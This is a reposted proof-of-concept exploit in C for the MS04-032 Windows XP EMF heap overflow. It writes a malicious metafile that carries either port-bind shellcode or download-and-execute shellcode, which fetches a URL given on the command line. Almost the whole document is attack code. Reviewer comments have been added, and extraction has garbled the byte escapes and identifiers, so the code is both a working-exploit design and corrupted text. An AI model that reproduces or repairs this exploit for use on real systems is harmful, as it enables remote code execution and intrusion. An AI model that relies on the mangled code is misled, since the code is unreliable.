[EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) HEAP


--- SNIP ---

/* HOD-MS04032-EMF-EXPL2.C:

*

* (Ms04-032) Microsoft Windows XP Metafile (.emf) HEAP

Overflow

*

* EXPLOIT VERSION 0.2 (public) Coded by

*

*

*. :: [HouseOfDabus] ::.

*

*

* [AT Inbox Dot Ru]

* ------------------------------------------------- ------------------

* ABOUT WMF / EMF:

* Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats
* are vector files that can contain a raster image ...

*

* ------------------------------------------------- ------------------

* The vulnerability will be triggered by either viewing a malicious
* file or by navigating to a directory which contains a malicious
* file and displays it as a thumbnail.

*

* Graphics Rendering Engine Vulnerability - CAN-2004-0209

* ------------------------------------------------- ------------------

* TESTED ON:

* - Internet Explorer 6.0 (sp1) (ip1) (ip1) (IExplore.exe)

* - EXPLORER (Explorer.exe)

* - Windows XP SP1

*

* ------------------------------------------------- ------------------

* Compile:

* Win32 / VC : CL HOD-MS04032-EMF-EXPL.C

* WIN32 / CYGWIN: GCC HOD-MS04032-EMF-EXPL.C

-LWS2_32.lib

* Linux: GCC -O HOD-MS04032-EMF-EXPL

HOD-MS04032-EMF-EXPL.C

*

* ------------------------------------------------- ------------------

* Command Line Parameters / Arguments:

*

* HOD.EXE

[ConnectBack IP]

*

* Shellcode:

* 1 - Portbind shellcode

* 2 - Connectback shellcode

*

* ------------------------------------------------- ------------------

* EXAMPLES:

*

* C: /> HOD-MS04032-EMF-EXPL.EXE EXPL.EMF 1 7777

*

* C: /> HOD-MS04032-EMF-EXPL.EXE EXPL.EMF 2

http://host/file.exe

*

* ------------------------------------------------- ------------------ *

* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.

*

*/

/* #define _win32 */

#include

#include

#include

#ifdef _win32

#pragma comment (Lib, "WS2_32")

#include

#ELSE

#include

#include

#include

#ENDIF

#include

/*
 * emfheader: fixed enhanced-metafile header record that main() writes first
 * (sizeof(emfheader)-1 bytes, i.e. without the literal's trailing NUL).
 * The bytes 0x20 0x45 0x4d 0x46 (" EMF") on the third line match
 * ENHMETA_SIGNATURE, the header field that marks a file as an enhanced
 * metafile; the two trailing dwords are described only by the author's own
 * comments at the end of the literal.
 * NOTE(review): every "\x" byte escape on this page was mangled to "/ x" by
 * the page extraction and the inline comments lost their delimiters, so as
 * printed these are plain-text literals rather than the intended bytes.
 * Nothing is reconstructed here.
 */
Unsigned char emfheader [] =

"/ x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x20 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x4c / x03 / x00 / x00 / x00 / x20 / x45 / x4d / x46 / x00 / x00 / x01 / x00"

"/ x40 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / xff / xff / x00 / x00"

"/ XEB / X12 / X90 / X90 / X90 / X90 / X90 / X90"

"/ x9e / x5c / x05 / x78" / * call [EDI 0x74H] - rpcrt4.dll * /

"/ xb4 / x73 / xed / x77"; / * TOP SEH - XP SP1 * /

/*
 * portbind_sc: payload bytes selected by shellcode option 1.  It is not
 * written verbatim: main() first copies two bytes into the array at offset
 * 266 (the port from argv[3], XORed with 0x8888, in network byte order) and
 * then writes sizeof(portbind_sc)-1 bytes followed by endoffile.
 * NOTE(review): the byte escapes are mangled ("/ x" for "\x") and several
 * lines are corrupted beyond that (e.g. "/ x 2008", "/ x / x8a", and a
 * stray "" at the end of one line), so the printed text does not
 * correspond to any definite byte sequence.  It is left exactly as found.
 */
Unsigned char portbind_sc [] =

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ Xeb / X03 / X5D / XEB / X05 / XE8 / XF8 / XFF"

"/ XFF / XFF / X8B / XC5 / X83 / XC0 / X11 / X33 / XC9 / X01 / X80 / X30 / X88"

"/ x40 / x03 / x64 / x03 / x7c / x09 / x64 / x08 / x88 / x88 / x88 / x60 / xc4"

"/ X01 / XCE / X74 / X77 / XFE / X74 / XE0 / X06 / XC6 / X86 / X64 / X60 / XD9"

"/ x89 / x88 / x88 / x01 / xce / x4e / Xe0 / xbb / xba / x88 / x88 / Xe0 / XFF / XFB / XBA / XD7"

"/ XDC / X77 / XDE / X4E / X01 / XCE / X70 / X77 / XFE / X74 / XE0 / X25 / X51 / X8D / X46 / X60"

"/ XB8 / X01 / XCE / X5A / X77 / XFE / X74 / XE0 / XFA / X76 / X3B / X9E / X60"

"/ Xa8 / x89 / x 2008 / x88 / x01 / xce / x46 / x77 / xfe / x74 / x68 / x67 / x46 / x68 / XE8 / x60"

"/ x88 / x89 / xce / x42 / x77 / xfe / x70 / x74 / xb3 / x60" "/ x88 / x89 / x88 / x88 / x01 / xce / x7c / X77 / XFE / X70 / XE0 / X51 / X81 / X7D / X25 / X60 ""

"/ x78 / x88 / xce / x78 / x77 / xfE / x70 / x7 / x2c / x92 / xf8 / x4f / x60"

"/ X68 / X01 / XCE / X64 / X77 / XFE / X70 / XE0 / X2C / X25 / XA6 / X61 / X60"

"/ X58 / X01 / XCE / X60 / X77 / XFE / X70 / XE0 / X6D / XC1 / X0E / XC1 / X60"

"/ X48 / X01 / XCE / X6A / X77 / XFE / X70 / XE0 / X6F / XF1 / X4E / XF1 / X60"

"/ X38 / X01 / XCE / X5E / XBB / X77 / X09 / X64 / X7C / X89 / X88 / X88 / XDC"

"/ XE0 / X89 / X77 / XDE / X7C / XD8 / XD8 / XD8 / XD8 / XC8 / XD8 / XC8 / XD8"

"/ x77 / xde / x78 / x03 / x50 / xdf / xdf / x / x8a / x88 / xab / x6f / x03 / x44 / xe2 / x9e"

"/ xd9 / xdb / x77 / xde / x64 / xdf / xdb / x77 / xde / x60 / xbb / x77 / xdf / xd9 / xdb / x77"

"/ XDE / X6A / X03 / X58 / X01 / XCE / X36 / XE0 / XEB / XE5 / XEC / X88 / X01 / XEE / X4A / X0B"

"/ X4C / X24 / X05 / XB4 / XAC / XBB / X48 / XBB / X41 / X08 / X49 / X9D / X23 / X6A / X75 / X4E"

"/ XCC / XAC / X98 / XCC / X76 / XCC / XAC / XB5 / X01 / XDC / XAC / XC0 / X01 / XDC / XAC / XC4"

"/ X01 / XDC / XAC / XD8 / X05 / XCC / XAC / X98 / XDC / XD8 / XD9 / XD9 / XD9 / XC9 / XD9 / XC1"

"/ XD9 / XD9 / X77 / XFE / XDE / XD9 / X77 / XDE / X46 / X03 / X44 / XE2 / X77 / X77 / XB9 / X77"

"/ XDE / X5A / X03 / X40 / X77 / XFE / X36 / X77 / XDE / X5E / X63 / X16 / X77 / XDE / X9C / XDE"

"/ XEC / X29 / XB8 / X03 / XC8 / X84 / X03 / XF8 / X94 / X25 / X03 / XC8 / X80"

"/ XD6 / X4A / X8C / X88 / XDB / XDD / XDE / XDF / X03 / XE4 / XAC / X90 / X03 / XCD / XB4 / X03"

"/ xdc / x8d / xf0 / x8b / x5d / x03 / xc2 / x90 / x03 / xd2 / xa8 / x8b / x55 / x6b / xba / XC1"

"/ x03 / xbc / x03 / x8b / x7d / xbb / x77 / x74 / xbb / x48 / x24 / xb2 / x4c / xfc / x8f / x49"

"/ x47 / x85 / x8b / x70 / x63 / x7a / xb3 / xf4 / xac / x9c / xfd / x69 / x03 / xd2 / xac / x8b"

"/ X55 / XEE / X03 / X84 / XC3 / X03 / XD2 / X94 / X8B / X55 / X03 / X8C / X03 / X8B / X4D / X63"

"/ x8a / xbb / x48 / x03 / x5d / xd7 / xd6 / xd5 / xd3 / x4a / x8c / x88";

/*
 * Download_sc: payload bytes selected by shellcode option 2 ("download &
 * exec").  main() writes sizeof(Download_sc)-1 bytes, then argv[3] (the URL)
 * verbatim with no length limit, then the single byte ENDOFURL as a
 * terminator, then endoffile.  The literal ends with the plain string "hod"
 * followed by one more byte.
 * NOTE(review): byte escapes are mangled to "/ x" throughout and several
 * lines are corrupted beyond recovery ("/ x 47", "/ x-x26", "/ x6 (x56"),
 * so the printed text is not a definite byte sequence.  Left as found.
 */
Unsigned char Download_sc [] = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ XEB / X0F / X58 / X80 / X30 / X17 / X40 / X81 / X38 / X6D / X30 / X30 / X21 / X75 / XF4"

"/ XeB / X05 / XE8 / XEC / XFF / XFF / XFF / XFE / X94 / X16 / X17 / X17 / X4A / X42 / X26"

"/ XCC / X73 / X9C / X14 / X57 / XE8 / X57 / X62 / XEE / X9C / X44 / X14"

"/ X71 / X26 / XC5 / X71 / XAF / X17 / X07 / X71 / X96 / X2D / X5A / X4D / X63 / X10 / X3E"

"/ XD5 / XFE / XE5 / XE8 / XE8 / XE8 / X9E / XC4 / X9C / X6D / X2B / X16 / XC0 / X14 / X48"

"/ x6f / x9c / x5c / x0f / x9c / x64 / x37 / x9c / x6c / x33 / x16 / xc1 / x16 / xc0 / Xeb"

"/ xba / x16 / xc7 / x81 / x90 / xda / x46 / x26 / xde / x97 / xd6 / x18 / xe4 / xb1 / x65"

"/ X1D / X81 / X4E / X90 / XEA / X63 / X05 / X50 / X50 / XF5 / XF1 / XA9 / X18 / X17 / X17"

"/ x17 / x3e / xd9 / x3e / xe0 / xfe / xff / xe8 / xe8 / x-x26 / xd7 / x71 / x9c / x10"

"/ XD6 / XF7 / X15 / X9C / X64 / X0B / X16 / XC1 / X16 / XD1 / XBA / X16 / XC7 / X9E / XD1"

"/ x9e / xc0 / x4a / x9a / x92 / xb7 / x17 / x17 / x17 / x57 / x97 / x2f / x16 / x62 / xed"

"/ XD1 / X17 / X17 / X9A / X92 / X0B / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X7F / X13"

"/ x17 / x17 / x07 / x17 / x17 / x7f / x68 / x81 / x8f / x17 / x7f / x17"

"/ x17 / x17 / x17 / x92 / x9a / x17 / x17 / x17 / x9a / x92 / x18 / x17"

"/ x17 / x17 / x 47 / x40 / x9a / x9a / x42 / x17 / x17 / x17 / x46 / xe8"

"/ XC7 / X9E / XD0 / X9A / X92 / X4A / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X26 / XDE"

"/ X46 / X46 / XE8 / XC7 / X9E / XD4 / X9A / X92 / X7C / X17 / X17 / X17"

"/ x47 / x40 / xde / x46 / x46 / x46 / x46 / x9a / x82 / xb6 / x17 / x17"

"/ x17 / x45 / x44 / xd4 / x9a / x92 / x6b / x17 / x17 / x17 / x47 / x40"

"/ Xe8 / XC1 / X9A / X9A / X86 / X17 / X17 / X17 / X46 / X7F / X68 / X81 / X8F / X17 / XE8"

"/ xa2 / x17 / x44 / x17 / xc7 / x48 / x9a / x92 / x3e / x17 / x17 / x17"

"/ x47 / x40 / x17 / x17 / x17 / x17 / x9a / x8a / x82 / x17 / x17 / x17"

"/ X44 / XE8 / XC7 / X9E / XD4 / X9A / X92 / X26 / X17 / X17 / X17 / X47 / X40 / XE8 / XC1"

"/ XE8 / X17 / X17 / XE8 / XA2 / X9A / X17 / X17 / X17 / X44 / XE8 / XC7" "/ X9A / X92 / X2E / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X44 / XE8 / XC7 / X9A / X92 "

"/ x56 / x17 / x40 / x17 / xc1 / x7f / x12 / x17 / x17 / x17 / x9a / x9a"

"/ x82 / x17 / x17 / xc7 / x9a / x92 / x5e / x17 / x17 / x17 / x47 / x40"

"/ XE8 / XC1 / X7F / X17 / X17 / X17 / X17 / XE8 / XC7 / XFF / X6F / XE9 / XE8 / XE8 / X50"

"/ x72 / x73 / x47 / x56 / x73 / x73 / x65 / x72 / x64 / x64 / x17 / x5b"

"/ x78 / x76 / x73 / x5b / x7e / x65 / x6 (x56 / x17 / x41 / x7e / x65"

"/ x63 / x56 / x7b / x7b / x78 / x74 / x17 / x48 / x7b / x74 / x65 / x72"

"/ x76 / x63 / x17 / x48 / x7b / x63 / x72 / x17 / x48 / x7b / x74 / x7b"

"/ x78 / x40 / x7e / x79 / x52 / x6f / x72 / x74 / x17 / x52 / x6f / x7e"

"/ x63 / x74 / x72 / x64 / x64 / x17 / x40 / x7e / x79 / x5e / x79 / x72"

"/ x63 / x17 / x72 / x65 / x79 / x72 / x63 / x58 / x67 / x72 / x79 / x56"

"/ x17 / x5e / x79 / x63 / x72 / x63 / x58 / x67 / x72 / x79 / x42 / x65"

"/ x7b / x56 / x17 / x72 / x65 / x79 / x72 / x63 / x45 / x72 / x76 / x73"

"/ x51 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x7a / x27"

"/ x27 / x39 / x72 / x6f / x72 / x17" "hod" "/ x21";

/* endoffile: four zero bytes appended after either payload.  main() writes
 * a hard-coded count of 4 rather than sizeof(endoffile)-1; the two agree
 * only as long as this literal stays four bytes long. */
Unsigned char endoffile [] = "/ x00 / x00 / x00 / x00";

/*
 * USAGE: print the command-line help to stdout and terminate the process.
 * Called from main() when argc < 4 or when the shellcode selector is not
 * 1 or 2.  Never returns.
 * NOTE(review): exit(0) reports success for a usage error, so a calling
 * script cannot tell "help printed" from a completed run; a non-zero
 * status would be the usual choice.  The "%s" line prints only the
 * program name here, although the examples in the file header take three
 * further arguments -- the placeholders were most likely lost to the page
 * extraction (angle brackets stripped).  The identifier case ("Void",
 * "Printf", "Char * PROG" vs. "prog") is extraction damage as well.
 */
Void

USAGE (Char * PROG)

{

Printf ("USAGE: / N");

Printf ("% s / n", prog);

Printf ("/ nshellcode: / n");

Printf ("1 - portbind shellcode / n");

Printf ("2 - Download & Exec Shellcode / N / N");

exit (0);

}

/*
 * Main: write the proof-of-concept .emf file.
 *   argv[1]  output path, opened for writing
 *   argv[2]  shellcode selector, 1 or 2 (anything else prints usage)
 *   argv[3]  port (selector 1) or URL (selector 2)
 * Output layout: emfheader, then either portbind_sc (port patched in at
 * offset 266) or Download_sc + argv[3] + ENDOFURL, then endoffile.
 * Returns 0; both usage errors and fopen() failure leave via exit(0).
 * NOTE(review): the return values of fwrite() and fclose() are never
 * checked, so a short or failed write still prints "OK"; argv[2] and
 * argv[3] go through atoi() with no range or error reporting (a
 * non-numeric port yields 0 and an out-of-range one is silently truncated
 * to unsigned short); and the error path exits with status 0.  Tokens such
 * as "Memcpy (portbind_sc 266", "'/ X01'", "\"WB\"" and "[ ] OK" are
 * presumably `portbind_sc + 266`, `'\x01'`, `"wb"` and `[+] OK` before the
 * page extraction mangled them; they are left as printed.
 */
int

Main (int Argc, char ** argv)

{

/* single terminator byte written after the URL in the option-2 branch */
CHAR ENDOFURL = '/ X01';

UNSIGNED SHORT Port;

Int sc;

File * fp;

Printf ("/ N (ms04-032) Microsoft Windows XP Metafile

(.emf) Heap overflow / n / n ");

/* the argc check shares this line with the banner printf -- the two
 * statements were merged by the page extraction, not the author */
Printf ("--- code by. :: [HouseOfDabus] ::. --- / n / n"); if (Argc <4) USAGE (Argv [0]);

SC = ATOI (Argv [2]);

IF ((SC> 2) || (SC <1)) USAGE (Argv [0]);

/* output is opened before any validation of argv[3]; an existing file at
 * argv[1] is truncated even if the later steps do nothing useful */
FP = fopen (Argv [1], "WB");

IF (fp == NULL) {

Printf ("[-] error: CAN / 'T CREATE FILE:% S / N", Argv [1]);

exit (0);

}

/ * Header * /

/* sizeof(...)-1 drops the string literal's terminating NUL */
FWRITE (EMFHEADER, 1, SIZEOF (EMFHEADER) -1, FP);

PRINTF ("[*] shellcode:");

IF (sc == 1) {

Port = ATOI (Argv [3]);

Printf ("Portbind, Port =% U / N", Port);

/* the port is XORed with 0x8888 and converted to network byte order
 * before being copied over two bytes of the payload at offset 266; the
 * reason for the XOR is not visible in this file */
Port = HTONS (port ^ (unsigned short) 0x8888);

Memcpy (portbind_sc 266, & port, 2);

FWRITE (portbind_sc, 1, sizeof (portbind_sc) -1, fp);

FWRITE (Endoffile, 1, 4, FP);

}

Else {

Printf ("Download & Exec, URL =% S / N", Argv [3]);

FWRITE (Download_SC, 1, SIZEOF (Download_sc) -1,

FP);

/* argv[3] is copied verbatim, whatever its length, and is followed by
 * the one-byte ENDOFURL terminator rather than a NUL */
FWRITE (Argv [3], 1, Strlen (Argv [3]), FP);

FWRITE (& EndOfurl, 1, 1, fp);

FWRITE (Endoffile, 1, 4, FP);

}

/* printed unconditionally -- no write above was checked */
Printf ("[ ] OK / N");

Fclose (fp);

Return 0;

}

--- SNIP ---

